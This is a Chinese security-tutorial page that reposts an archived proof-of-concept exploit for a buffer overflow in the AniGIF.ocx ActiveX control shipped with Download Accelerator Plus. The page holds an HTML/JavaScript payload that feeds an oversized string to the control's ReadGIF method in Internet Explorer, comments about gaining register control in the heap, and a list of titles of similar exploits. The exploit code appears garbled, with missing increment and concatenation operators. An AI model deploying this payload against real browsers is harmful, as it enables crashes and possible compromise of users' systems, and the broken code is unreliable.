手机
当前位置:查字典教程网 >网络安全 >Exploit >Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
摘要://anigif.ocxbywww.jcomsoft.comcanbefounddistribuitedwithsomeapplicatio...

<html>

<body>

<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />

</object>

<script language=javascript>

// anigif.ocx by www.jcomsoft.com can be found distribuited with some applications,

// I found it in Download Accelerator Plus 6.8.

// DAP comes with an old version, but the last from jcomsoft is also vulnerable:

// there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods,

// the funny thing is that after the first exception that will be handled by IE,

// when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx

// with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap

// overflow scenario.

var buf;

for (var i=0; i<259; i ) buf = "X";

buf ="BBBB";

buf = "CCCC";

for (var i=0; i<5728; i ) buf = "H";

target.ReadGIF(buf);

window.location = "http://www.google.com";

</script>

</body>

</html>

【Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC】相关文章:

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

Joomla Component DT Register Remote SQL injection Vulnerability

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

精品推荐
分类导航